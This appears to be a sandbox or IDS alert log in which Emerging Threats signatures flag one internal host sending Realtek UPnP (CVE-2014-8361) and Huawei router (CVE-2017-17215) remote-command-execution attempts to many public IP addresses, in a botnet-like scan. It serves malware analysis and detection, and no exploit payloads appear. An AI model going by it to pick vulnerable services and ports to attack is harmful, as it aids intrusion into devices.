                                                07/20/24-23:05:36.275713TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4106852869192.168.2.1489.77.15.240
                                                07/20/24-23:05:59.471230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4142652869192.168.2.14184.132.87.238
                                                07/20/24-23:06:02.598486TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614760052869192.168.2.14212.173.5.107
                                                07/20/24-23:05:39.035942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3306637215192.168.2.1441.64.63.209
                                                07/20/24-23:06:01.285003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5427852869192.168.2.1485.165.219.183
                                                07/20/24-23:05:59.046185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3934252869192.168.2.1412.176.0.4
                                                07/20/24-23:05:40.421092TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5754252869192.168.2.1447.104.234.54
                                                07/20/24-23:05:59.587077TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5809452869192.168.2.1413.58.163.5
                                                07/20/24-23:05:37.470290TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24174252869192.168.2.14129.37.83.27
                                                07/20/24-23:05:47.470061TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614493852869192.168.2.1483.112.33.152
                                                07/20/24-23:05:56.106041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599237215192.168.2.1441.204.84.61
                                                07/20/24-23:05:39.365818TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615762452869192.168.2.1464.79.183.126
                                                07/20/24-23:06:27.853068TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4393052869192.168.2.14175.131.12.125
                                                07/20/24-23:05:50.522257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3697437215192.168.2.14157.133.106.26
                                                07/20/24-23:05:34.656192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3480037215192.168.2.14197.232.70.152
                                                07/20/24-23:05:50.557200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4123437215192.168.2.14157.181.108.35
                                                07/20/24-23:06:08.628126TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614051252869192.168.2.1461.85.255.31
                                                07/20/24-23:05:50.555898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364637215192.168.2.14197.216.248.221
                                                07/20/24-23:05:56.325754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6042437215192.168.2.1441.78.75.255
                                                07/20/24-23:05:37.465013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5067852869192.168.2.1489.113.83.91
                                                07/20/24-23:05:40.471609TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25021452869192.168.2.14183.253.82.115
                                                07/20/24-23:06:02.906267TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3505252869192.168.2.149.213.251.239
                                                07/20/24-23:05:56.997034TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3921252869192.168.2.14143.90.94.100
                                                07/20/24-23:05:39.773172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5185437215192.168.2.14197.144.158.58
                                                07/20/24-23:06:13.705655TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25753252869192.168.2.1496.131.9.180
                                                07/20/24-23:06:03.378832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377237215192.168.2.1441.249.79.68
                                                07/20/24-23:05:34.662485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308837215192.168.2.1478.116.111.6
                                                07/20/24-23:05:56.036527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5226437215192.168.2.14157.46.102.30
                                                07/20/24-23:05:38.640803TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614976452869192.168.2.14157.171.149.72
                                                07/20/24-23:05:35.378993TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4530652869192.168.2.14153.126.184.30
                                                07/20/24-23:06:00.927462TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3328852869192.168.2.14140.82.127.22
                                                07/20/24-23:05:33.830838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4209237215192.168.2.1441.209.69.235
                                                07/20/24-23:05:39.771399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4198637215192.168.2.14179.244.27.199
                                                07/20/24-23:06:50.028546TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3539052869192.168.2.1497.21.167.55
                                                07/20/24-23:05:52.557712TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24138652869192.168.2.14196.229.8.153
                                                07/20/24-23:05:52.728679TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23660252869192.168.2.1431.251.184.113
                                                07/20/24-23:06:02.417792TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24169652869192.168.2.14107.64.165.241
                                                07/20/24-23:06:13.391443TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5480852869192.168.2.14129.99.98.243
                                                07/20/24-23:05:47.129772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441837215192.168.2.14157.180.177.138
                                                07/20/24-23:06:19.756250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5661252869192.168.2.14189.135.163.53
                                                07/20/24-23:06:01.224583TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3379652869192.168.2.14151.106.207.115
                                                07/20/24-23:05:36.526908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112437215192.168.2.1441.202.249.78
                                                07/20/24-23:05:52.554753TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4224052869192.168.2.1417.65.162.120
                                                07/20/24-23:05:47.086079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4364037215192.168.2.14157.216.181.223
                                                07/20/24-23:05:57.229188TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614440452869192.168.2.1443.139.9.185
                                                07/20/24-23:06:02.417792TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24863052869192.168.2.1439.191.83.40
                                                07/20/24-23:05:36.325662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5726837215192.168.2.14197.199.66.253
                                                07/20/24-23:05:57.233976TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4667652869192.168.2.141.64.96.57
                                                07/20/24-23:05:35.879451TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3487052869192.168.2.14114.179.104.124
                                                07/20/24-23:06:01.763636TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3852452869192.168.2.1453.49.234.47
                                                07/20/24-23:05:56.137269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4796437215192.168.2.1441.51.224.2
                                                07/20/24-23:05:34.653253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184437215192.168.2.14183.188.212.130
                                                07/20/24-23:05:40.314185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5545452869192.168.2.14132.228.159.81
                                                07/20/24-23:05:37.454499TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23595452869192.168.2.14117.129.252.99
                                                07/20/24-23:05:57.224112TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3283252869192.168.2.14155.180.189.24
                                                07/20/24-23:06:00.516920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5805652869192.168.2.1414.19.59.241
                                                07/20/24-23:05:37.441296TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5264252869192.168.2.141.200.111.50
                                                07/20/24-23:06:02.925501TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3966252869192.168.2.1464.150.182.18
                                                07/20/24-23:06:01.290865TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3529452869192.168.2.1427.99.183.157
                                                07/20/24-23:05:50.522257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176037215192.168.2.14157.58.173.100
                                                07/20/24-23:05:48.787750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3766237215192.168.2.14197.249.199.219
                                                07/20/24-23:05:37.590968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3509652869192.168.2.14136.195.130.35
                                                07/20/24-23:05:38.757977TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614112652869192.168.2.14116.71.24.211
                                                07/20/24-23:05:37.476343TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25906252869192.168.2.14119.225.48.58
                                                07/20/24-23:06:02.283865TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25062252869192.168.2.14209.239.99.54
                                                07/20/24-23:06:12.509551TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23409852869192.168.2.14160.153.18.205
                                                07/20/24-23:06:02.867753TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3989052869192.168.2.14147.147.61.107
                                                07/20/24-23:05:38.634552TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4138452869192.168.2.1438.198.246.87
                                                07/20/24-23:06:00.198211TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613423852869192.168.2.14186.25.143.158
                                                07/20/24-23:05:47.464031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3898252869192.168.2.1475.169.253.25
                                                07/20/24-23:05:56.900578TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4967452869192.168.2.1458.74.85.108
                                                07/20/24-23:05:38.953817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4976037215192.168.2.1441.60.65.216
                                                07/20/24-23:05:40.353037TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25043852869192.168.2.14171.41.249.212
                                                07/20/24-23:06:05.101340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5994252869192.168.2.14104.64.121.105
                                                07/20/24-23:05:57.438719TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614672852869192.168.2.14207.85.188.236
                                                07/20/24-23:06:01.472268TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5549052869192.168.2.14110.206.40.7
                                                07/20/24-23:06:18.422288TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24337652869192.168.2.14154.119.243.101
                                                07/20/24-23:05:52.545166TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25677652869192.168.2.1452.34.41.29
                                                07/20/24-23:05:59.303078TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5577652869192.168.2.14167.41.255.218
                                                07/20/24-23:06:29.180793TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615298852869192.168.2.14140.134.248.178
                                                07/20/24-23:06:09.320815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5602852869192.168.2.14203.215.159.116
                                                07/20/24-23:06:02.017303TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615184652869192.168.2.1496.237.181.208
                                                07/20/24-23:05:52.531304TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3874652869192.168.2.14129.121.134.219
                                                07/20/24-23:05:58.178719TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23379652869192.168.2.14102.91.220.41
                                                07/20/24-23:06:07.332948TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615315252869192.168.2.14126.244.253.92
                                                07/20/24-23:05:58.875074TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3675852869192.168.2.1431.155.247.160
                                                07/20/24-23:05:50.528919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4135437215192.168.2.14175.45.215.161
                                                07/20/24-23:05:52.644108TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24809252869192.168.2.1425.15.58.154
                                                07/20/24-23:06:16.651508TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613350252869192.168.2.1471.86.175.101
                                                07/20/24-23:05:39.765891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942237215192.168.2.14157.58.228.27
                                                07/20/24-23:06:17.435643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5235452869192.168.2.14200.16.112.137
                                                07/20/24-23:05:57.161619TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5032852869192.168.2.1485.19.89.54
                                                07/20/24-23:05:57.653975TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3820852869192.168.2.1439.213.19.113
                                                07/20/24-23:06:01.994638TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616058852869192.168.2.14173.164.101.22
                                                07/20/24-23:06:12.543371TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614935652869192.168.2.14221.65.131.62
                                                07/20/24-23:05:38.452869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5949452869192.168.2.1424.160.46.49
                                                07/20/24-23:05:33.861759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5949237215192.168.2.14157.208.177.172
                                                07/20/24-23:05:59.249229TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24111452869192.168.2.14128.103.206.27
                                                07/20/24-23:06:29.433951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3766052869192.168.2.14175.208.49.127
                                                07/20/24-23:05:33.863090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5997637215192.168.2.14121.209.116.212
                                                07/20/24-23:05:52.575727TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3332852869192.168.2.14151.208.74.251
                                                07/20/24-23:06:24.662240TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615717252869192.168.2.14168.17.71.158
                                                07/20/24-23:05:40.462607TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25186452869192.168.2.14164.11.137.216
                                                07/20/24-23:05:36.324298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079437215192.168.2.14197.125.130.118
                                                07/20/24-23:06:00.927462TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3382052869192.168.2.1437.48.45.30
                                                07/20/24-23:05:47.086079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3787037215192.168.2.14197.15.224.18
                                                07/20/24-23:05:47.014311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5203437215192.168.2.1441.92.3.24
                                                07/20/24-23:06:17.555463TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614098452869192.168.2.1480.124.106.135
                                                07/20/24-23:05:47.125782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4392237215192.168.2.1480.252.95.7
                                                07/20/24-23:05:56.069521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838437215192.168.2.14197.66.223.70
                                                07/20/24-23:05:59.119232TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25690052869192.168.2.1453.153.197.182
                                                07/20/24-23:06:08.903735TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4643052869192.168.2.1471.152.254.101
                                                07/20/24-23:06:01.997543TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24379652869192.168.2.1453.70.52.187
                                                07/20/24-23:06:08.993675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3450237215192.168.2.1434.190.114.234
                                                07/20/24-23:05:57.625091TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5374452869192.168.2.14131.196.248.38
                                                07/20/24-23:05:52.603344TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5674252869192.168.2.14161.253.199.89
                                                07/20/24-23:05:34.625707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5566437215192.168.2.14208.191.39.47
                                                07/20/24-23:06:24.304142TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4248452869192.168.2.1412.108.63.195
                                                07/20/24-23:05:42.180899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3893837215192.168.2.1441.104.121.61
                                                07/20/24-23:06:01.997543TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613656052869192.168.2.14201.78.138.208
                                                07/20/24-23:06:31.773037TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4558452869192.168.2.14119.170.177.102
                                                07/20/24-23:05:40.369944TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5711652869192.168.2.14115.80.228.184
                                                07/20/24-23:05:36.339999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4005637215192.168.2.14197.47.5.182
                                                07/20/24-23:05:39.078777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5736837215192.168.2.14197.252.40.127
                                                07/20/24-23:05:46.572869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4047052869192.168.2.1417.65.162.120
                                                07/20/24-23:05:59.093934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3685252869192.168.2.1482.141.157.248
                                                07/20/24-23:05:58.090071TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3655452869192.168.2.14204.111.195.125
                                                07/20/24-23:06:00.248123TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23440852869192.168.2.14219.175.221.8
                                                07/20/24-23:05:57.173548TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614497452869192.168.2.14134.45.103.79
                                                07/20/24-23:05:42.256029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140437215192.168.2.14197.84.133.143
                                                07/20/24-23:05:34.656192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246237215192.168.2.14197.86.55.32
                                                07/20/24-23:06:01.256977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5740452869192.168.2.144.35.177.241
                                                07/20/24-23:06:13.525153TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25192852869192.168.2.14202.180.182.96
                                                07/20/24-23:05:52.682403TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25759652869192.168.2.1444.18.231.106
                                                07/20/24-23:05:42.127943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4206637215192.168.2.14156.155.255.188
                                                07/20/24-23:06:01.691705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5167652869192.168.2.14138.239.248.75
                                                07/20/24-23:06:09.697115TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6004052869192.168.2.1424.224.126.85
                                                07/20/24-23:07:07.975226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3717652869192.168.2.1472.33.167.45
                                                07/20/24-23:06:17.237965TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3325052869192.168.2.14201.236.226.231
                                                07/20/24-23:06:03.394385TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613906252869192.168.2.14203.174.131.227
                                                07/20/24-23:06:17.539924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6024837215192.168.2.14197.7.68.217
                                                07/20/24-23:05:35.942639TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4800052869192.168.2.1465.119.53.40
                                                07/20/24-23:06:16.113185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5037652869192.168.2.14198.64.2.133
                                                07/20/24-23:05:35.513809TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5783452869192.168.2.1449.40.97.50
                                                07/20/24-23:05:38.899872TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615199652869192.168.2.1486.28.56.254
                                                07/20/24-23:05:59.106017TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615499052869192.168.2.14194.102.249.55
                                                07/20/24-23:06:02.436396TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615157052869192.168.2.14160.22.179.152
                                                07/20/24-23:06:08.903734TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5292452869192.168.2.14205.125.234.208
                                                07/20/24-23:05:39.124038TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613883852869192.168.2.14206.220.79.127
                                                07/20/24-23:05:37.459218TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24296852869192.168.2.14199.49.205.148
                                                07/20/24-23:05:37.648285TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23791652869192.168.2.14172.51.35.214
                                                07/20/24-23:05:39.324403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3901652869192.168.2.1498.62.200.115
                                                07/20/24-23:05:38.762457TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615067252869192.168.2.1450.94.4.19
                                                07/20/24-23:05:59.464785TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614872652869192.168.2.142.56.91.127
                                                07/20/24-23:05:58.384426TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4869452869192.168.2.1460.38.174.213
                                                07/20/24-23:06:31.652096TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616084452869192.168.2.1464.149.50.144
                                                07/20/24-23:05:38.951134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3519837215192.168.2.1441.91.188.103
                                                07/20/24-23:05:44.975364TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614929852869192.168.2.14166.212.7.50
                                                07/20/24-23:05:36.445837TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5999052869192.168.2.14159.166.244.164
                                                07/20/24-23:05:58.772622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6012452869192.168.2.1450.236.40.162
                                                07/20/24-23:05:52.546679TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25449252869192.168.2.1467.42.251.191
                                                07/20/24-23:05:37.590968TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25569452869192.168.2.1412.94.49.225
                                                07/20/24-23:07:03.123324TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5025252869192.168.2.14119.157.54.136
                                                07/20/24-23:06:14.583817TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613978852869192.168.2.14139.35.146.241
                                                07/20/24-23:05:47.120793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826237215192.168.2.1441.189.186.102
                                                07/20/24-23:06:34.627679TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614907052869192.168.2.14218.90.44.232
                                                07/20/24-23:05:40.339812TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23356652869192.168.2.14119.243.24.21
                                                07/20/24-23:05:56.402930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3903037215192.168.2.14197.144.119.68
                                                07/20/24-23:05:35.760150TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4862652869192.168.2.14198.22.21.63
                                                07/20/24-23:05:57.832966TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615658052869192.168.2.14187.11.67.4
                                                07/20/24-23:05:50.498027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600837215192.168.2.1451.3.168.140
                                                07/20/24-23:05:52.508651TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4258652869192.168.2.1448.186.210.104
                                                07/20/24-23:05:45.424850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5946237215192.168.2.1457.27.32.62
                                                07/20/24-23:06:08.169080TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4067052869192.168.2.14198.58.66.130
                                                07/20/24-23:05:34.648426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4446037215192.168.2.14197.183.189.239
                                                07/20/24-23:05:57.181822TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613438652869192.168.2.144.4.30.157
                                                07/20/24-23:05:37.445623TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25744252869192.168.2.1460.73.199.117
